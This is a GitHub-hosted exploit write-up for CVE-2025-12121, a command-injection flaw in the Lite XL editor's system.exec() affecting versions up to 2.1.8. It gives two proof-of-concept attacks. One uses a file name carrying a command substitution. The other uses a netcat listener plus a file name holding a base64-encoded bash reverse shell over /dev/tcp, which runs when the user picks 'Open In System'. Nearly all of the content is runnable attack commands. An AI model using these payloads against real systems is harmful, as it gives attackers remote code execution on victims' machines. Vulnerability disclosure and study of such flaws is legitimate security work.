-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCVE-2025-12121
More file actions
34 lines (24 loc) · 988 Bytes
/
CVE-2025-12121
File metadata and controls
34 lines (24 loc) · 988 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# Exploit Title: Lite XL <= 2.1.8 - system.exec() Shell Injection (RCE)
# Date: 2025-10-31
# Exploit Author: Dogus DEMIRKIRAN
# Vendor Homepage: https://github.com/lite-xl/lite-xl
# Version: <= 2.1.8
# Bugs: Remote Code Execution
# CVE: CVE-2025-12121
===============================================================================
# PoC (Filename Injection)
# Create a file with a malicious name:
touch '$(touch litexl_rce.txt)'
# In Lite XL, right-click → "Open In System"
# or any action that triggers system.exec().
# The file litexl_rce.txt will be created.
===============================================================================
# Reverse Shell PoC
# Attacker:
nc -lvnp 4444
# Victim:
touch '$(echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash)'
# Open directory in Lite XL and trigger:
# "Open In System"
# A reverse shell is returned to the listener.
===============================================================================